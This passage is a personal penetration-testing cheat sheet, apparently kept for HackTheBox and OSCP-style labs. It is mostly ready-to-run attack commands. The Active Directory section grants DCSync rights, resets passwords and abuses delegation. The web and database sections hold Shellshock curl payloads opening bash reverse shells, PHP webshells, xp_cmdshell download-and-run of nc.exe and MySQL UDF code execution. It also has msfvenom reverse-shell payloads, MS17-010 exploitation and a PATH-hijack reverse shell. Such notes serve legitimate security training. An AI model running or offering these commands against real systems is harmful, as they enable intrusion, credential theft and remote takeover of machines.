  Gives tom the right to reset claire's password.
* Change a password (Herman's password here)

```
$passwd = ConvertTo-SecureString -String 'miku123$' -AsPlainText -Force
Set-DomainUserPassword -Identity Herman -AccountPassword $passwd
```

* Change the password and add the user (herman) to a group (backup_admin)

```
import-module ./PowerView.ps1
$passwd = ConvertTo-SecureString -String 'miku123$' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('HTB\Herman', $passwd)
Add-DomainGroupMember -Identity 'Backup_Admins' -Members Herman -Credential $cred
```

You need to log in again for it to take effect.

### Powerup

`powershell -exec bypass -c "iex(new-object system.net.webclient).downloadstring('http://<host>/PowerUp.ps1'); invoke-AllChecks"`

------------------------------------------------

* DC Sync (domain object)

```
$passwd = ConvertTo-SecureString -String 'miku123$' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('HTB\miku', $passwd)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity miku -Rights DCSync
```

  then we can use secretsdump
  `secretsdump.py '<Domain>/<Account>:<Pasword>@<DC_IP>'`

* delegation (computer object)

```
# -------- On Server Side
# Upload tools
upload /home/user/Tools/Powermad/Powermad.ps1 pm.ps1
upload /home/user/Tools/Ghostpack-CompiledBinaries/Rubeus.exe r.exe

# Import PowerMad
Import-Module ./pm.ps1

# Set variables
Set-Variable -Name "FakePC" -Value "FAKE01"
Set-Variable -Name "targetComputer" -Value "DC"

# With Powermad, Add the new fake computer object to AD.
New-MachineAccount -MachineAccount (Get-Variable -Name "FakePC").Value -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

# With Built-in AD modules, give the new fake computer object the Constrained Delegation privilege.
Set-ADComputer (Get-Variable -Name "targetComputer").Value -PrincipalsAllowedToDelegateToAccount ((Get-Variable -Name "FakePC").Value + '$')

# With Built-in AD modules, check that the last command worked.
Get-ADComputer (Get-Variable -Name "targetComputer").Value -Properties PrincipalsAllowedToDelegateToAccount
```

```
# With Rubeus, generate the new fake computer object password hashes.
# Since we created the computer object with the password 123456 we will need those hashes
# for the next step.
./r.exe hash /password:123456 /user:FAKE01$ /domain:support.htb
```

* LAPS_Readers
  https://github.com/kfosaaen/Get-LAPSPasswords
  `Get-ADComputer DC01 -property 'ms-mcs-admpwd'`
  `lapsdumper -u 'svc_deploy' -p 'test' -d timelapse.htb -l 10.10.11.152`
* gMSADump
  https://github.com/micahvandeusen/gMSADumper
  `python3 gMSADumper.py -u user -p password -d domain.local`

## WEB

https://github.com/w181496/Web-CTF-Cheatsheet

#### add DNS

`vim /etc/hosts`

#### ffuf

https://github.com/tamimhasan404/FFUF-Tips-And-Tricks

* vhost:
  `ffuf -c -u http://artcorp.htb -H 'Host: FUZZ.artcorp.htb' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -mc 200`
* dir:
  `ffuf -c -u https://seal.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -v -fc 401,403,404`
* wordlist:
  `ffuf -w /usr/share/SecLists-master/Discovery/Web-Content/raft-large-directories.txt -u https://xyz.com/FUZZ -e .html,.php,.txt,.pdf`
* recursion
  `ffuf -w /usr/share/SecLists-master/Discovery/Web-Content/raft-large-directories.txt -u https://xyz.com/FUZZ -recursion-depth 2`
* sub-domain
  `wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.horizontall.htb" --sc 200 <IP>`
* Subdirectories (this one is fast, use it first)
  `ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -t 100 -e php,html,txt -mc 200,302,301 -u http://<10.129.95.185>/FUZZ`

#### feroxbuster

`feroxbuster -u https://seal.htb -k`

#### gobuster

* Subdirectories
  `sudo gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u {URL}`
* subdomain
  `gobuster vhost -u http://artcorp.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt`

#### dirbuster

`dirbuster -u https://10.10.10.60 -t 20 -l /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r sense-10.10.10.60/dirbuster_dir-med -e php,txt,html`

#### dirsearch

https://github.com/maurosoria/dirsearch
`python3 dirsearch.py -u https://10.129.86.72`

#### shellshock (a cgi-bin script can download a shell)

```
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.5/4444 0>&1" \
  http://10.10.10.56:80/cgi-bin/user.sh
```

#### SSTI

https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#handlebars-nodejs

#### Webshell

* php

```
<?php exec("/bin/bash -c 'bash -i &> /dev/tcp/KALI_IP/4444 0<&1'") ?>
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.154 8082 >/tmp/f"); ?>
<?php echo system($_REQUEST['cmd']);?>   one-liner webshell
```

#### Curl

```
curl -i -H "User-agent: () { :;}; /bin/bash -i >& /dev/tcp/10.10.14.20/4444 0>&1" http://10.129.96.97/cgi-bin/user.sh
```

#### Wpscan

`wpscan --url http://192.168.1.86`

#### sslscan

`sslscan <IP>` check the SSL/TLS version
`nano /etc/ssl/openssl.cnf` edit the configuration here

#### svwar

`svwar -m INVITE -e100-999 <IP>` check the SIP version (needed for the Elastix payload)

## database

* priv

```
SELECT is_srvrolemember('sysadmin'); #check priv, go to next step
```

```
EXECUTE sp_configure 'show advanced options',1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell',1;
RECONFIGURE;
```

* reverse shell

```
xp_cmdshell "powershell.exe wget http://[Your_tun0_IP]:8000/nc.exe -OutFile c:\\Users\Public\\nc.exe"
xp_cmdshell "powershell -c cd c:\Users\Public; .\nc.exe -e cmd.exe 10.10.14.9 443"
```

* mysql RCE

```
select @@version_compile_os, @@version_compile_machine;
select @@plugin_dir;
show variables like 'plugin%';
select load_file('\\\\IP\\share\\lib_mysqludf_sys_64.dll') into dumpfile "C:\\xampp\\mysql\\lib\\plugin\\udf.dll";
select sys_exec("\\\\192.168.xx.135\\share\\WinTool\\nc.exe -e C:\\Windows\\System32\\cmd.exe -nv IP PORT");
```

## MSF

`msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f war > shell.war`
`msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.2 LPORT=4444 -o reverse-shell.aspx`
`msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.14.14_443.exe` Windows reverse shell
`msfvenom -p java/shell_reverse_tcp lhost=10.10.14.22 lport=443 -f war -o rev.war` Tomcat Linux
`msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.83 LPORT=9002 -f war > rev_shell-9002.war` Tomcat Windows
`msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.20 LPORT=443 -b '\x00\x0A\x0D' -f python -v payload` usable for buffer overflow

* ms17-010
  https://github.com/helviojunior/MS17-010.git

```
msfvenom -p windows//reverse_tcp lhost=<LAB IP> lport=<PORT> -f exe > writeup.exe
python2 send_and_execute.py 10.10.10.40 ../writeup.exe
```

#### MS17-010

https://github.com/helviojunior/MS17-010
https://www.cnblogs.com/mrlonely2018/p/15137143.html

```
## username changed to //
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=7879 -f exe > shell_reverse_tcp
nc -lvnp port
python2 send_and_execute.py 10.10.10.4 /home/kali/Desktop/shell_reverse_tcp
```

#### buffer overflow

https://hackercat.org/oscp/buffer-overflows-made-easy-notes-oscp-preparation

### AD Penetration

#### Enumeration

```
nltest /domain_trusts Domain "Domain"   trust list of the domain
```

AS-REP

| User status | AS-REP message |
| -------- | -------- |
| User exists and is enabled | KDC_ERR_PREAUTH_REQUIRED |
| User exists but is disabled | KDC_ERR_CLIENT_REVOKED |
| User does not exist | KDC_ERR_C_PRINCIPAL_UNKNOWN |

#### pfx key

```
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv-key.pem -nodes
openssl pkcs12 -in ./legacyy_dev_auth.pfx -out public.pem -clcerts -nokeys
evil-winrm -i 10.10.11.152 -S -k priv-key.pem -c public.pem
```

* ACL rights

```
GenericAll - full rights to the object (add users to a group or reset user's password)
GenericWrite - update object's attributes (i.e logon script)
WriteOwner - change object owner to attacker controlled user take over the object
WriteDACL - modify object's ACEs and give attacker full control right over the object
AllExtendedRights - ability to add user to a group or reset password
ForceChangePassword - ability to change user's password
Self (Self-Membership) - ability to add yourself to a group
```

## Linux privilege escalation

* Command hijacking

```
export PATH=/home/m4lwhere:$PATH   # prepend to the environment variable
touch gzip                         # create the command to hijack
chmod 777 gzip
# (put the following into gzip)
#!/bin/bash
bash -p
bash -i >& /dev/tcp/10.10.16.3/4242 0>&1
sudo /opt/scripts/access_backup.sh
```

## Google Hacking

```
Filetype: <file type>
site: <github.com>
intitle : "index of" "parent directory"
ext: php
ext: xml
```

## SQL usage

### Mysql

#### Login

`mysql -u root -p'root' -h 192.168.50.16 -P 3306`

#### Commands

```
show databases;
SELECT user, authentication_string FROM mysql.user WHERE user = 'offsec';
```

### Mssql

#### Login

`impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth`

```
SELECT @@version;                                check the version
SELECT name FROM sys.databases;                  list all database names
SELECT * FROM offsec.information_schema.tables;
```